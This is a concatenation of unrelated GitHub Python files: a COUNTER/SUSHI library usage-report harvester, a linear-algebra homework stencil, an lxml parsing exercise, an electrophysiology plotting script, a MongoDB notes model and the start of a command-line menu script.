add_sub(cust_ref_elem, \"{%(sushi)s}ID\" % NS, customer_reference)\t\t#Create a child node of 'CustomerReference', tagged 'ID' and holding the cutomer ref ID\r\n\r\n\tcust_name_elem = add_sub(cust_ref_elem, \"{%(sushi)s}Name\" % NS, customer_name)\r\n\r\n\treport_def_elem = etree.SubElement(\t rr, \"{%(sushi)s}ReportDefinition\" % NS, Name=report, Release=str(release) )\r\n\tfilters = etree.SubElement(report_def_elem, \"{%(sushi)s}Filters\" % NS)\r\n\tudr = etree.SubElement(filters, \"{%(sushi)s}UsageDateRange\" % NS)\r\n\tbeg = etree.SubElement(udr, \"{%(sushi)s}Begin\" % NS)\r\n\r\n\tbeg.text = start_date.strftime(\"%Y-%m-%d\")\r\n\tend = etree.SubElement(udr, \"{%(sushi)s}End\" % NS)\r\n\tend.text = end_date.strftime(\"%Y-%m-%d\")\r\n\t#print(etree.tostring(rooty, pretty_print = True, encoding = 'unicode'))\r\n\tpayload = etree.tostring( rooty, pretty_print=True, xml_declaration=True, encoding=\"utf-8\" )\r\n\t#=============================================================\r\n\theaders = {\r\n\t\t\"SOAPAction\": '\"SushiService:GetReportIn\"',\r\n\t\t\"Content-Type\": \"text/xml; charset=UTF-8\",\r\n\t\t\"Content-Length\": str(len(payload)),\r\n\t}\r\n\t\r\n\tresponse = rq.post(url=wsdl_url, headers=headers, data=payload, verify=verify) # Post the SUSHI tree to the server and save teh response as 'response'\r\n\tif sushi_dump:\r\n\t\tlogger.debug(\r\n\t\t\t\"SUSHI DUMP: request: %s \\n\\n response: %s\", payload, response.content\r\n\t\t)\r\n\t#rt = etree.fromstring(response.content) # tombstoned for testing\r\n\treturn response.content\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef jr1_df(lgn, month, year):\r\n\t'''\r\n\tPull down a single month's JR1 report, and return it as a DataFrame\r\n\t-----------------------------------------------------------------------------\r\n\tlgn -> a 3-member tuple of strings that holds the SUSHI server's location and login credentials\r\n\t\tlgn[0] -> (str) The SUSHI server URL\r\n\t\tlgn[1] -> (str) The SUSHI requestor ID\r\n\t\tlgn[2] -> (str) the SUSHI customer ID\r\n\tmonth -> (int) the month of the requested report\r\n\tyear -> (int) the year of the requested report\r\n\t'''\r\n\ttry:\r\n\t\trepo = etree.fromstring(raw_xml_rep( lg = lgn, mnth = month, yr = year, report = 'JR1'))\r\n\r\n\t\tcolset = ['ItemName', 'Print_ISSN', 'Proprietary', 'Online_ISSN', 'ItemPlatform', 'ItemPublisher', 'ItemDataType', 'ft_total', 'ft_html', 'ft_pdf']\r\n\t\t#============================================================\r\n\t\trootp = repo[0][0][3][0][1]\r\n\t\tbdf = pd.DataFrame(columns = colset)\r\n\r\n\t\tfor i in range(2,len(rootp.getchildren())): #loop through the subtrees that have content to go into the dataframe\r\n\t\t\ttemp = [''] * len(colset)\t\t\t\t#Create the holder list that will hold this row and go into the DF\r\n\t\t\tfor child in rootp[i].getchildren():\t\t#loop through the first level of each subtree\r\n\t\t\t\r\n\t\t\t\t# Grab the elements that are in the first level of the rootp tree after the root\r\n\t\t\t\tfor colname in colset:\t#loop through all of the columns and grab the first-level texts whose tag matches a column name\r\n\t\t\t\t\tif \"{http://www.niso.org/schemas/counter}\"+colname == 
child.tag:\r\n\t\t\t\t\t\ttemp[colset.index(colname)] = child.text\r\n\r\n\t\t\t\t# Grab the elements that are under an 'ItemIdentifier' subtree by thier type\r\n\t\t\t\tif child.tag == '{http://www.niso.org/schemas/counter}ItemIdentifier':\t#look at each subtree whose root is an ItemIdentifier\r\n\t\t\t\t\tItemID_children_list = list(child.getchildren())\t#This should be two elements: the type and the value\r\n\t\t\t\t\ttype = str(child.findall('{http://www.niso.org/schemas/counter}Type')[0].text)\t#grab the type, which should match a column name\r\n\t\t\t\t\tval = str(child.findall('{http://www.niso.org/schemas/counter}Value')[0].text)\t\t#grab the value, in a sting format.\r\n\t\t\t\t\tif type in colset:\t#make sure the type is an element in colset\r\n\t\t\t\t\t\ttemp[colset.index(type)] = val\t#add the new val to temp in the correct column\r\n\t\t\t\t\r\n\t\t\t\t# Grab the elements that are under an 'ItemPerformance' tag.\r\n\t\t\t\tif child.tag == '{http://www.niso.org/schemas/counter}ItemPerformance':\r\n\t\t\t\t\tinstance = child.find('{http://www.niso.org/schemas/counter}Instance')\r\n\t\t\t\t\tmetric_type = instance.find('{http://www.niso.org/schemas/counter}MetricType').text\r\n\t\t\t\t\tct = instance.find('{http://www.niso.org/schemas/counter}Count').text\r\n\t\t\t\t\ttemp[colset.index(metric_type)] = ct\r\n\t\t\tbdf.loc[len(bdf)] = temp\r\n\t\treturn bdf\r\n\t# Catch potential errors and return an error flag and an empty dataframe. This matches what's sometimes\r\n\t # returned from error-ed out SUSHI requests, so we'll just check for this format of dataframe to determine when an error has occurred\r\n\texcept:\r\n\t\tprint(\"Error in handling\",lgn)\r\n\t\terr_df = pd.DataFrame(columns = colset)\r\n\t\treturn err_df\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef mr1_df(lgn,month,year):\r\n\t'''\r\n\tPull down a single month's MR1 report, and return it as a DataFrame\r\n\t-----------------------------------------------------------------------------\r\n\tlgn -> a 3-member tuple of strings that holds the SUSHI server's location and login credentials\r\n\t\tlgn[0] -> (str) The SUSHI server URL\r\n\t\tlgn[1] -> (str) The SUSHI requestor ID\r\n\t\tlgn[2] -> (str) the SUSHI customer ID\r\n\tmonth -> (int) the month of the requested report\r\n\tyear -> (int) the year of the requested report\r\n\t'''\r\n\t# Initialize the report in var 'repo'\r\n\trepo = etree.fromstring(raw_xml_rep( lg = lgn, mnth = month, yr = year, report = 'MR1'))\r\n\tmonth_date = pd.Period(freq = 'M', year = year , month = month)\r\n\r\n\r\n\t# Initialize the colset, df, and report data parent node\r\n\tcolset = ['ItemName', 'ItemPlatform', 'ItemPublisher', 'Category', 'MetricType', 'Date', 'Count']\r\n\tdf = pd.DataFrame(columns = colset)\r\n\ttry:\r\n\t\trootp = repo[0][0][3][0][1] #\tset up the root node for the actual report content\r\n\t\t\r\n\t\tfor report_item in rootp.getchildren(): #\trepo[0][0][3][0][1] is the parent node to all of the ReportItem nodes\r\n\t\t\ttemp = [''] * len(colset)\t\t\t\t#\tCreate the holder list that will hold this row and go into the DF \r\n\t\t\tif report_item.tag == '{http://www.niso.org/schemas/counter}ReportItems':\r\n\t\t\t\tfor 
data_node in report_item.getchildren():\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Loop through all of the columns and grab the first-level texts whose tag matches a column name\r\n\t\t\t\t\tfor colname in colset:\r\n\t\t\t\t\t\tif \"{http://www.niso.org/schemas/counter}\"+colname == data_node.tag:\r\n\t\t\t\t\t\t\ttemp[colset.index(colname)] = data_node.text\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Dig into the data_node's ItemPerformance subnode and grab the category, metric type, and count data points\r\n\t\t\t\t\tif data_node.tag == '{http://www.niso.org/schemas/counter}ItemPerformance':\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t# Grab the top-level category data point\r\n\t\t\t\t\t\tcateg = instance = data_node.find('{http://www.niso.org/schemas/counter}Category')\r\n\t\t\t\t\t\ttemp[colset.index('Category')] = categ.text\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t# Drill into the Instance node and find the 'MetricType' and 'Count' nodes, then add them to 'temp'\r\n\t\t\t\t\t\tinstance = data_node.find('{http://www.niso.org/schemas/counter}Instance')\r\n\t\t\t\t\t\tmetric_type = instance.find('{http://www.niso.org/schemas/counter}MetricType').text\r\n\t\t\t\t\t\tct = instance.find('{http://www.niso.org/schemas/counter}Count').text\r\n\t\t\t\t\t\ttemp[colset.index('MetricType')] = metric_type\r\n\t\t\t\t\t\ttemp[colset.index('Date')] = month_date.strftime('%b-%Y')\r\n\t\t\t\t\t\ttemp[colset.index('Count')] = ct\r\n\t\t\t\t\t\t\r\n\t\t\t# Add the completed row to the dataframe\r\n\t\t\tif temp != [''] * len(colset):\r\n\t\t\t\tdf.loc[len(df)] = temp\r\n\t\treturn df\r\n\texcept:\r\n\t\treturn df\r\n\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef br1_df(lgn,month,year):\r\n\t# download report, define dataframe to populate and return, and format date for date column\r\n\trepo = etree.fromstring(raw_xml_rep( lg = lgn, mnth = month, yr = year, report = 'BR1'))\r\n\tcolset = ['ItemName', 'ItemPlatform', 'ItemPublisher', 'Print_ISBN', 'Online_ISBN', 'Proprietary', 'ItemDataType', 'Category', 'MetricType', 'Date', 'Count']\r\n\tdf = pd.DataFrame(columns = colset)\r\n\tdate = str(month) + '/' + str(year)\r\n\t\r\n\ttry:\r\n\t\trootp = repo[0][0][3][0][1]\r\n\t\tfor report_row_node in rootp:\r\n\t\t\ttemp = [''] * len(colset)\r\n\t\t\tif report_row_node.tag == '{http://www.niso.org/schemas/counter}ReportItems':\r\n\t\t\t\t# Create a line-holder vector, then go into the actual data nodes for this row\r\n\t\t\t\ttemp[colset.index('Date')] = date\r\n\t\t\t\tfor data_node in report_row_node:\r\n\t\t\t\t\r\n\t\t\t\t\t # STEP I: Loop through all of the columns and grab the first-level texts whose tag matches a column name\r\n\t\t\t\t\t #NOTE: Might be better to replace with a parser to remove URL from XML tag and use \"if-in\" to check colset for remaining tag-text. 
\r\n\t\t\t\t\tfor colname in colset:\r\n\t\t\t\t\t\tif \"{http://www.niso.org/schemas/counter}\"+colname == data_node.tag:\r\n\t\t\t\t\t\t\ttemp[colset.index(colname)] = data_node.text\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t# STEP II: in each of the 3 ItemIdentifier nodes, grab the Type and Values subnodes' texts and \r\n\t\t\t\t\t #use the Type to identify the correct column for the Value text.\r\n\t\t\t\t\tif data_node.tag == '{http://www.niso.org/schemas/counter}ItemIdentifier':\r\n\t\t\t\t\t\ttype = data_node.find('{http://www.niso.org/schemas/counter}Type').text\r\n\t\t\t\t\t\tvalue = data_node.find('{http://www.niso.org/schemas/counter}Value').text\r\n\t\t\t\t\t\ttemp[colset.index(type)] = value\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t#STEP III: grab the Category subnode's text and populate that column, then\r\n\t\t\t\t\t #search the Instance subnode and take the values of its MetricType and Count subnodes.\r\n\t\t\t\t\t #Use these values to populate the appropriate spaces in the array.\r\n\t\t\t\t\tif data_node.tag == '{http://www.niso.org/schemas/counter}ItemPerformance':\r\n\t\t\t\t\t\ttemp[colset.index('Category')] = data_node.find('{http://www.niso.org/schemas/counter}Category').text\r\n\t\t\t\t\t\tinstance = data_node.find('{http://www.niso.org/schemas/counter}Instance')\r\n\t\t\t\t\t\ttemp[colset.index('MetricType')] = instance.find('{http://www.niso.org/schemas/counter}MetricType').text\r\n\t\t\t\t\t\ttemp[colset.index('Count')] = instance.find('{http://www.niso.org/schemas/counter}Count').text\r\n\r\n\t\t\t# Add the completed row to the dataframe\r\n\t\t\tif temp != [''] * len(colset):\r\n\t\t\t\tdf.loc[len(df)] = temp\r\n\t\treturn df\r\n\texcept:\r\n\t\treturn df\r\n\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef mr1_over_time(start_year, end_year, start_month, end_month, credentials, out_file = ''):\r\n\t'''\r\n\tThis is the in-progress version of the MR1 over-time report harvester.\r\n\t'''\r\n\tcol_set = ['ItemName', 'ItemPlatform', 'ItemPublisher', 'Category', 'MetricType']\r\n\ttemp = pd.DataFrame(columns = col_set)\r\n\tfor y in range (start_year, end_year +1):\t\t# Loop through the full year range\r\n\t\tfor m in range(start_month, end_month +1):\t# loop through the full month range\r\n\t\t\tif temp.empty:\t#if this is the first month\r\n\t\t\t\ttemp = mr1_df(credentials,m,y)\r\n\t\t\t\tif temp.empty:\r\n\t\t\t\t\tprint('This B empty.', m, y)\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(m,y, \"confirmed\")\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tstart = time.time()\r\n\t\t\t\t\tto_add = mr1_df(credentials,m,y)\r\n\t\t\t\t\ttemp = pd.concat([temp,to_add], ignore_index = True)\r\n\t\t\t\t\tend = time.time()\r\n\t\t\t\t\tprint(end-start, m, y)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(m, y, 'not available')\r\n\ttemp.fillna(0, inplace = True)\r\n\tif out_file != '':\r\n\t\ttemp.to_csv(out_file)\r\n\treturn temp","repo_name":"ChrisHergert/PyCounter-Conversion","sub_path":"pybr.py","file_name":"pybr.py","file_ext":"py","file_size_in_byte":16527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39389477645","text":"# version code 031e89400b69\n# Please fill out this stencil and 
submit using the provided submission script.\n\nfrom GF2 import one\nfrom math import sqrt, pi\nfrom matutil import coldict2mat\nfrom matutil import mat2coldict\nfrom matutil import mat2rowdict\nfrom solver import solve\nfrom vecutil import list2vec\nfrom vec import Vec\nfrom submit import test_format\n\n\n\n## 1: (Problem 5.14.1) Span of Vectors over R, A\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n#\n# For example, [1, 3, 5] would mean 1*[2,0,4,0] + 3*[0,1,0,1] + 5*[0,0,-1,-1]\n\nrep_1 = [...]\nrep_2 = [...]\nrep_3 = [...]\n\n\n\n## 2: (Problem 5.14.2) Span of Vectors over R, B\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n\nlin_comb_coefficients_1 = [...]\nlin_comb_coefficients_2 = [...]\nlin_comb_coefficients_3 = [...]\nlin_comb_coefficients_4 = [...]\n\n\n\n## 3: (Problem 5.14.3) Span of Vectors over GF2 A\n# Use one from the GF2 module, not the integer 1.\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n\ngf2_rep_1 = [...]\ngf2_rep_2 = [...]\ngf2_rep_3 = [...]\n\n\n\n## 4: (Problem 5.14.4) Span of Vectors over GF2 B\n# Use one from the GF2 module, not the integer 1.\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n\ngf2_lc_rep_1 = [...]\ngf2_lc_rep_2 = [...]\ngf2_lc_rep_3 = [...]\ngf2_lc_rep_4 = [...]\n\n\n\n## 5: (Problem 5.14.5) Linear Dependence over R A\n# For each part, please provide your solution as a list of the coefficients for\n# the generators of V.\n\nlin_dep_R_1 = [2,-1,-1]\nlin_dep_R_2 = [28,-7,4]\nlin_dep_R_3 = [-4138/1035, -35/207, 16/621, 1, 0]\n\n\n\n## 6: (Problem 5.14.6) Linear Dependence over R B\n# Please record your solution as a list of coefficients\n\nlinear_dep_R_1 = [1/3,-1/3,1]\nlinear_dep_R_2 = [2*pi*(sqrt(2)), sqrt(2), pi]\nlinear_dep_R_3 = [0,0,0,0]\n\n\n\n## 7: (Problem 5.14.7) Superfluous vector\n# Assign the COEFFICIENT of the vector to each variable.\n# Assign sum_to to the vector that you are expressing as a linear combination\n# of the other two. Write the name of the vector as a STRING. i.e. 'u' or 'w'\n\nu = -1\nv = 1\nw = 0\nsum_to = 'w'\n\n\n\n## 8: (Problem 5.14.8) 4 linearly dependent vectors, every 3 are independent\n# Please use the Vec class to represent your vectors\n\nindep_vec_1 = list2vec([1,-1,0,0])\nindep_vec_2 = list2vec([0,1,-1,0])\nindep_vec_3 = list2vec([0,0,1,-1])\nindep_vec_4 = list2vec([-1,0,0,1])\n\n\n\n## 9: (Problem 5.14.9) Linear Dependence over GF(2) A\n# Please give your solution as a list of coefficients of the linear combination\n\nzero_comb_1 = [one, one, 0, one]\nzero_comb_2 = [0,one,one,one]\nzero_comb_3 = [one,one,0,0,one]\n\n\n\n## 10: (Problem 5.14.10) Linear Dependence over GF(2) B\n# Please give your solution as a list of coefficients of the vectors\n# in the set in order (list the coefficient for v_i before v_j if i < j).\n\nsum_to_zero_1 = [...]\nsum_to_zero_2 = [...]\nsum_to_zero_3 = [...]\nsum_to_zero_4 = [...]\n\n\n\n## 11: (Problem 5.14.11) Exchange Lemma for Vectors over $\\R$\n## Please express your answer as a list of ints, such as [1,0,0,0,0]\n\nexchange_1 = [0,0,0,0,1]\nexchange_2 = [0,0,0,1,0]\nexchange_3 = [0,0,1,0,0]\n\n\n\n## 12: (Problem 5.14.12) Exchange Lemma for Vectors over GF(2)\n# Please give the name of the vector you want to replace as a string (e.g. 
'v1')\n\nreplace_1 = 'v3'\nreplace_2 = 'v1'\nreplace_3 = 'v1'\n\n\n\n## 13: (Problem 5.14.13) rep2vec\ndef rep2vec(u, veclist):\n    '''\n    Input:\n        - u: a vector as an instance of your Vec class with domain set(range(len(veclist)))\n        - veclist: a list of n vectors (as Vec instances)\n    Output:\n        vector v (as Vec instance) whose coordinate representation is u\n    Example:\n        >>> a0 = Vec({'a','b','c','d'}, {'a':1})\n        >>> a1 = Vec({'a','b','c','d'}, {'b':1})\n        >>> a2 = Vec({'a','b','c','d'}, {'c':1})\n        >>> rep2vec(Vec({0,1,2}, {0:2, 1:4, 2:6}), [a0,a1,a2]) == Vec({'a', 'c', 'b', 'd'},{'a': 2, 'c': 6, 'b': 4, 'd': 0})\n        True\n    '''\n    return coldict2mat(veclist) * u\n\n\n## 14: (Problem 5.14.14) vec2rep\ndef vec2rep(veclist, v):\n    '''\n    Input:\n        - veclist: a list of vectors (as instances of your Vec class)\n        - v: a vector (as Vec instance) with domain set(range(len(veclist)))\n             with v in the span of set(veclist).\n    Output:\n        Vec instance u whose coordinate representation w.r.t. veclist is v\n    Example:\n        >>> a0 = Vec({'a','b','c','d'}, {'a':1})\n        >>> a1 = Vec({'a','b','c','d'}, {'b':1})\n        >>> a2 = Vec({'a','b','c','d'}, {'c':1})\n        >>> vec2rep([a0,a1,a2], Vec({'a','b','c','d'}, {'a':3, 'c':-2})) == Vec({0, 1, 2},{0: 3.0, 1: 0.0, 2: -2.0})\n        True\n    '''\n    return solve(coldict2mat(veclist),v)\n\n\n## 15: (Problem 5.14.15) Superfluous Vector in Python\ndef is_superfluous(L, i):\n    '''\n    Input:\n        - L: list of vectors as instances of Vec class\n        - i: integer in range(len(L))\n    Output:\n        True if the span of the vectors of L is the same\n        as the span of the vectors of L, excluding L[i].\n\n        False otherwise.\n    Examples:\n        >>> a0 = Vec({'a','b','c','d'}, {'a':1})\n        >>> a1 = Vec({'a','b','c','d'}, {'b':1})\n        >>> a2 = Vec({'a','b','c','d'}, {'c':1})\n        >>> a3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\n        >>> is_superfluous([a0,a1,a2,a3], 3)\n        True\n        >>> is_superfluous([a0,a1,a2,a3], 0)\n        True\n        >>> is_superfluous([a0,a1,a2,a3], 1)\n        False\n    '''\n    if len(L) < 1:\n        return False\n\n    if len(L) == 1:\n        return L[0].is_almost_zero()\n\n    t = L.copy()\n    p = t.pop(i)\n    n = coldict2mat(t)\n    u = p - n*solve(n,p)\n    if u.is_almost_zero():\n        return True\n\n\n    return False\n\n\na0 = Vec({'a','b','c','d'}, {'a':1})\na1 = Vec({'a','b','c','d'}, {'b':1})\na2 = Vec({'a','b','c','d'}, {'c':1})\na3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\n\n# print(is_superfluous([a0,a1,a2,a3], 3), True)\n# print(is_superfluous([a0,a1,a2,a3], 3), True)\n# print(is_superfluous([a0,a1,a2,a3], 0),True)\n# print(is_superfluous([a0,a1,a2,a3], 1), False)\n\nD = {'a','b','c','d'}\nd0=Vec(D, {'a':1,'b':-1})\nd1=Vec(D, {'c':-1,'b':1})\nd2=Vec(D, {'c':1,'d':-1})\nd3=Vec(D, {'a':-1,'d':1})\nd4=Vec(D, {'b':1, 'c':1, 'd':-1})\n\n\n# print((is_superfluous([d0,d1,d2,d3],3)),True)\n# print(((is_superfluous([d0,d1,d2,d3],2))),True)\n# print(((is_superfluous([d0,d1,d2,d3],1))),True)\n# print(((is_superfluous([d0,d1,d2,d3],0))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],4))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],3))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],2))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],1))),True)\n# print(((is_superfluous([d0,d1,d2,d3,d4],0))),True)\n\nv1 = Vec({0, 1, 2},{0: 0.1111111111111111, 1: 0.2857142857142857, 2: 0.6})\nv2 = Vec({0, 1, 2},{0: 0.18181818181818182, 1: 0.17647058823529413, 2: 0.45454545454545453})\nv3 = Vec({0, 1, 2},{0: 0.24963924963924963, 1: 0.5171886936592819, 2: 1.122077922077922})\n# print(((is_superfluous([v1,v2,v3], 2))))\n# print(((is_superfluous([v1],0))))\n# 
print(((is_superfluous([Vec({0,1,2},dict())],0))))\n\n\n## 16: (Problem 5.14.16) is_independent in Python\ndef is_independent(L):\n i = 0\n while True:\n if i >= len(L):\n return True\n\n elif is_superfluous(L,i):\n return False\n\n else:\n i+=1\n\nvlist = [Vec({0, 1, 2},{0: 1}), Vec({0, 1, 2},{1: 1}), Vec({0, 1, 2},{2: 1}), Vec({0, 1, 2},{0: 1, 1: 1, 2: 1}), Vec({0, 1, 2},{1: 1, 2: 1}), Vec({0, 1, 2},{0: 1, 1: 1})]\n#print(is_independent(vlist), False)\n#print(is_independent(vlist[:3]),True)\n#print(is_independent(vlist[:2]), True)\n#print(is_independent(vlist[1:4]),True)\n#print(is_independent(vlist[2:5]),True)\n#print(is_independent(vlist[2:6]),False)\n#print(is_independent(vlist[1:3]),True)\n# print(is_independent(vlist[5:]),True)\n\n## 17: (Problem 5.14.17) Subset Basis\ndef subset_basis(T):\n i = 0\n A = T.copy()\n for x in T:\n if i >= len(A):\n break\n if is_superfluous(A,i):\n A.pop(i)\n\n else:\n i = i + 1\n\n return A\n\na0 = Vec({'a','b','c','d'}, {'a':1})\na1 = Vec({'a','b','c','d'}, {'b':1})\na2 = Vec({'a','b','c','d'}, {'c':1})\na3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\nsb = subset_basis([a0, a1, a2, a3])\nprint(all(v in [a0, a1, a2, a3] for v in sb))\n\n\n## 18: (Problem 5.14.18) Superset Basis Lemma in Python\ndef superset_basis(T, L):\n '''\n Input:\n - T: linearly independent list of Vec instances\n - L: list of Vec instances such that every vector in T is in Span(L)\n Output:\n Linearly independent list S containing all vectors (as instances of Vec)\n such that the span of S is the span of L (i.e. S is a basis for the span\n of L).1\n Example:\n >>> a0 = Vec({'a','b','c','d'}, {'a':1})\n >>> a1 = Vec({'a','b','c','d'}, {'b':1})\n >>> a2 = Vec({'a','b','c','d'}, {'c':1})\n >>> a3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\n >>> superset_basis([a0, a3], [a0, a1, a2]) == [Vec({'a', 'c', 'b', 'd'},{'a': 1}), Vec({'a', 'c', 'b', 'd'},{'b':1}),Vec({'a', 'c', 'b', 'd'},{'c': 1})]\n True\n '''\n k = T.copy()\n for i in L:\n k = k + [i]\n if not is_independent(k):\n k.remove(i)\n\n\n return k\n\n\na0 = Vec({'a','b','c','d'}, {'a':1})\na1 = Vec({'a','b','c','d'}, {'b':1})\na2 = Vec({'a','b','c','d'}, {'c':1})\na3 = Vec({'a','b','c','d'}, {'a':1,'c':3})\n\n#print(superset_basis([a0, a3], [a0, a1, a2]))\n\n## 19: (Problem 5.14.19) Exchange Lemma in Python\ndef exchange(S, A, z):\n '''\n Input:\n - S: a list of vectors, as instances of your Vec class\n - A: a list of vectors, each of which are in S, with len(A) < len(S)\n - z: an instance of Vec such that A+[z] is linearly independent\n Output: a vector w in S but not in A such that Span S = Span ({z} U S - {w})\n Example:\n >>> S = [list2vec(v) for v in [[0,0,5,3],[2,0,1,3],[0,0,1,0],[1,2,3,4]]]\n >>> A = [list2vec(v) for v in [[0,0,5,3],[2,0,1,3]]]\n >>> z = list2vec([0,2,1,1])\n >>> exchange(S, A, z) == Vec({0, 1, 2, 3},{0: 0, 1: 0, 2: 1, 3: 0})\n True\n '''\n pass\n\n","repo_name":"omrigildor/cs53","sub_path":"src/hw/The_Basis.py","file_name":"The_Basis.py","file_ext":"py","file_size_in_byte":10253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37916059727","text":"from lxml import etree\n\nwith open ('show_sec_zones.xml', 'r') as f:\n file = f.read()\n\nmy_xml = etree.fromstring(file)\n#print(my_xml.tag)\n#a = my_xml.find('zones-security')\n#print('Find tag of the first zones-security element')\n#print('-'*30)\n#print(a.tag)\n#print()\n#\n#ch = a.getchildren()\n#print('Find tag of all child elements of the first zones-security element')\n#print('-'*30)\n#for child 
in ch:\n# print(child.tag)\n\n#q4b\n#a= my_xml.getchildren()[0]\n#print(a)\n#new = a.find('zones-security-zonename')\n#print(new)\n#print(new.text)\n\n#q4c\na = my_xml.findall('zones-security')\nfor element in a:\n # print(element)\n new = element.find('zones-security-zonename')\n print(new, new.text)\n # print(element.text)\n\n#print(a)\n\n\n#txt = print(a.text)\n\n","repo_name":"abhinav2938/Kirk_python-course","sub_path":"exer7/q4a.py","file_name":"q4a.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17869636353","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 15 17:15:14 2019\n\n@author: localadmin1\n\"\"\"\nfrom tkinter.filedialog import askopenfilename, askdirectory\nfrom os import listdir\nfrom tkinter import Tk\nimport neo\nfrom math import floor\nimport scipy.signal as sig\nfrom quantities import Hz, s\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom plexon_an import *\nfrom sklearn.preprocessing import normalize\nTk().withdraw()\n \nfname=askopenfilename()\nreader= neo.io.PlexonIO(filename=fname)\nrec = reader.read_segment()\n\nselcan=input(\"What channel? (type number or ALL and press enter) \")\nlinw=float(input(\"How thick do you want the line? 0.1 is very thin 2 is very thick \"))\nstarplot=int(1000*float(input(\"First point to plot? type 0 if you want the all trace \")))\nendplot=int(1000*float(input(\"Last point to plot? type 299 if you want the all trace \")))\nshowspikes=0\n\nif selcan.upper()!=\"ALL\":\n channel=rec.analogsignals[int(selcan)-1][starplot:endplot]\n channel=remove_large_spikes(channel, 7) #change number to change visualised\n if showspikes==1: plot_spikes(channel,find_peaks(channel))\n else: plt.plot(channel.times,channel, 'k', linewidth=linw)\nelse:\n maxlist=[]\n minlist=[]\n arrchan=[]\n t=[]\n for i in rec.analogsignals:\n i=remove_large_spikes(i, 7) #change number to change visualised\n i=i[starplot:endplot] #change the range to plot \n arrchan.append(i.as_array())\n t.append(i.times)\n maxlist.append(max(i.as_array()))\n minlist.append(min(i.as_array()))\n\n fig, axs = plt.subplots(16, 1)\n for s,c in enumerate(arrchan):\n axs[s].plot(t[s],c, 'k', linewidth=linw)\n axs[s].set_ylim(min(minlist), max(maxlist))\n axs[s].set_xlabel('time')\n axs[s].set_ylabel('uV')\n \n\n plt.show()\n plt.savefig(fname[:-3]+'svg')\n\ntwodplots=0\nif twodplots==1:\n #No artifact removal!\n RECM=np.empty([len(rec.analogsignals),len(rec.analogsignals[0])])\n for c,v in enumerate(rec.analogsignals):\n RECM[c]=v.as_array()[:,0]\n \n print(\"Fig1:voltages,Fig2:Attempt at CSD, \\n Figs 3--6 correlation coefficient at differnt times\")\n plt.matshow(downsample_matrix_to(RECM,300))\n plt.colorbar()\n CSD=np.diff(np.diff(RECM,axis=0),axis=0)\n plt.matshow(downsample_matrix_to(CSD,300))\n plt.colorbar()\n for k in [1000,100000,200000,29000]:\n plt.matshow(np.corrcoef(RECM[:,k:k+1000]))\n plt.colorbar()\n\n\n \n","repo_name":"sapkotahari/recycling-centre","sub_path":"visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25207883787","text":"from database import db\nfrom bson.objectid import ObjectId\n\ndef save_cookie(id_cookie):\n if not isinstance(id_cookie, str):\n return None\n\n data = {\n \"id_cookie\": id_cookie\n }\n user_id = db.cookies.insert_one(data).inserted_id\n\n return user_id\n\ndef 
create_user(user_id):\n if not isinstance(user_id, str):\n return None\n \n data = {\n \"_id\": ObjectId(user_id)\n }\n\n user_id = db.users.insert_one(data).inserted_id\n return user_id\n\ndef check_user(id_cookie):\n if not isinstance(id_cookie, str):\n return None\n\n result = db.cookies.find_one({\"id_cookie\" : id_cookie})\n \n if not result:\n return None\n return result[\"_id\"]\n\ndef save_note(user_id, title, note):\n if not isinstance(user_id, str):\n return False\n if not isinstance(note, str):\n return False\n if not isinstance(title, str):\n return False\n\n data = {\n \"_id\": ObjectId(user_id),\n \"title\" : title,\n \"note\": note\n }\n note_id = db.notes.insert_one(data).inserted_id\n \n return bool(note_id)\n\ndef get_notes(user_id):\n if not isinstance(user_id, str):\n return None\n\n notes = db.notes.find({\"_id\" : ObjectId(user_id)})\n\n if notes.count() == 0:\n return None\n return notes\n","repo_name":"salujayatharth/notes","sub_path":"notes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39268317418","text":"import os\nimport signal\nimport sys\nfrom subprocess import Popen\n\nfrom PyInquirer import prompt\nfrom examples import custom_style_2\n\nquestions = [\n {\n 'type': 'list',\n 'name': 'user_option',\n 'message': 'Welcome! Which plot would you like to reproduce?',\n 'choices': [\"Figure 1\", \"Figure 2\", \"Figure 6\"]\n }\n]\n\nquestions_figure_6 = [\n {\n 'type': 'input',\n 'name': 'data_path',\n 'message': 'Path to the QMNIST dataset:',\n 'validate': 